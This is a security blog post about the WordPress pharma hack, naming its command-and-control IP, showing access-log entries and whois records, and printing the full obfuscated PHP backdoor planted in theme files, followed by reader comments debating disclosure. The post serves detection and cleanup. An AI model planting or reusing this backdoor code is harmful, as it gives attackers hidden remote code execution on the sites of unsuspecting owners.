WordPress Security

Pharma hack and their C&C (Command & control) server

A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:

Understanding and cleaning the pharma hack on WordPress

One thing we’ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address: 94.76.241.4 (curingin.com).

If your site has been affected you can double check your access.log for these entries:

94.76.241.4 – – [31/Jul/2010:06:07:59 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1” 500 374 “-” “-”
94.76.241.4 – – [31/Jul/2010:06:08:30 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1” 500 447 “-” “-”
94.76.241.4 – – [31/Jul/2010:11:06:55 -0700] “POST /wp-content/themes/classic/sidebar.php HTTP/1.1” 500 444 “-” “-”
94.76.241.4 – – [30/Jul/2010:12:57:41 -0700] “POST /wp-content/themes/classic/comments.php HTTP/1.1” 200 202 “-” “-”

This IP is hosted at Blueconnex and even after tons of abuse reports (from multiple sources), the’ve sat idle.

$ whois 94.76.241.4
route: 94.76.192.0/18
descr: Blueconnex Networks Ltd
origin: AS29550

$ whois curingin.com
Registrant:
Icarus Kann Team
Icarus Kann (ikaruskann@ymail.com)
Potokaki
Elounda
Samos,81300
GR
Tel. +210.9882728

Requests from the IP address try to access a backdoor they’ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):

< ?php $a = ‘m’.’d5′;
if($a($_REQUEST[$a])==’698357e86842′.’1222bcf89349bd5cf34d’)
{$w = ‘Cdbl0sYoWOiyJt3qtqyOoqxA’;$x = $_REQUEST[$w];
$y = ‘base’.’6′;$y.= ‘4_d’.’ecode’;$x = $y($x);$z = ‘creat’.’e_f’;
$z.= ‘unction’;$x = $z(”,$x);$x();} ?>

If your site is hacked and it keeps getting reinfected, look for this backdoor.

Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend W. Andrew Loe III did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).

That’s the first file the attackers uploaded to hack everything:
http://sucuri.net/?page=tools&title=blacklist&detail=7b1341a148b1d8a205587218f66ef912

You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:
http://sucuri.net/?page=tools&title=blacklist&detail=a9663c48164df1fcc59253aed5a0defc

This one is executed as well:
http://sucuri.net/?page=tools&title=blacklist&detail=eb5db5a81632a089fd07fa259c0448a6

So a very interesting and complex attack they’ve managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control.

If your site is infected and you need help, contact us. We’ll get your site cleaned up and malware-free right away.

Protect your interwebs!

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags

13 comments

Pingback: Tweets that mention Pharma hack and their C&C (Command & control) server | Sucuri -- Topsy.com
Sarah says:
August 12, 2010 at 8:14 pm
So you are saying they've distributed free themes with a backdoor built in?
Sneaky, clever and very dangerous.
As with all plugins and themes that you upload (to any system) we should be scanning the code for anything that doesn't look right. But realistically… the vast majority of users don't and can't.
I'd start with those encrypted footers. I understand why they are there… but as you've shown the backdoor isn't a big script so script size isn't an danger indicator.
1. dremeda says:
  August 12, 2010 at 8:26 pm
  Great comments Sarah, thanks!
  To clarify, it is in fact affecting themes, as well as plugins. There is no indication they've distributed exploited themes or plugins, although it is possible.
  Cheers,
  Dre
Pingback: Be afraid, be very afraid! « iTamers Simple SEO
Sarah says:
August 13, 2010 at 2:12 am
So how do you reckon they've got the first file up there?
Nathan says:
August 13, 2010 at 5:58 pm
Are you sure that it is a good idea to publish the code?
1. dremeda says:
  August 13, 2010 at 9:22 pm
  Nathan, thanks for the comment. We're not posting anything not already publicly available. In fact, we've cleaned 100's of 1000's of sites infected with this specific exploit. Most of these sites are either indexed on Google with this garbarge or easily found via complaints on Twitter.
  The idea here is to try and explain what is going on as we get more details. If we can get out (specifically to hosting providers) information which leads to killing this thing off, or at minimum slowing it down, then we're on the right track. For now, we'll continue to posting relevant information as often as possible.
  Hope this helps.
  Dre
  1. Nathan says:
    August 15, 2010 at 1:01 pm
    Do you remember a CIH virus? http://en.wikipedia.org/wiki/CIH_%28computer_viru…
    It's author was arrested in september 2000, but the virus source code leaked to the public. There where a lot of modifications of virus even after three years! http://www.betanews.com/article/Chernobyl-Virus-A…
    I think it's better not to publish the whole code, but the parts that can help people to identify it. You can provide the full source to authorized security professionals, that may want to learn it.
    In my opinion that security professionals must be more responsible and don't provide ready to use tools to hacker community. There are not so much hardcore hackers, but hundreds of skript kiddies and inexperienced hacker groups.
    I was hit by another type of pharma hack- it was relatively easy to clean. Their files was uploaded manually (by hand) using c99 shell and the php file was included in my index.php.
    What i am afraid of… if there are more then one group that plays with pharma hack – they will gain immediate level-up after reading your article. So in a month we will get a lot of similar hacks on modified codebase. Who will be responsible for that?
Steve says:
August 16, 2010 at 12:54 am
What happened to the NS Scanner?
1. dremeda says:
  August 16, 2010 at 10:41 am
  Hi Steve, we're no longer offering free scans to NS customers. NS has created their own solution to help with security issues. If you have any questions please contact NS.
  Thanks.
  My recent post Pharma hack and their C&C Command & control server
Michelle says:
August 19, 2010 at 10:41 pm
My wordpress site has been hacked with several viruses and I've been really lucky to have your solutions posted here work.
I went to it again today and an attack window popped up from Norton. I took a photo of it and put it on flickr: http://www.flickr.com/photos/hillison/4908661777/…
Any advice on what this is??
Pingback: Rail Europe trying to sell me Amoxicillin – Pharma hack | Sucuri
BinaryM Inc. says:
January 7, 2011 at 12:01 am
Is the original source of this attack known? I’m cleaning up a client’s site, found all pieces of the puzzle that I’ve seen around the web, but want to make sure it doesn’t come back. Very very sneaky attack.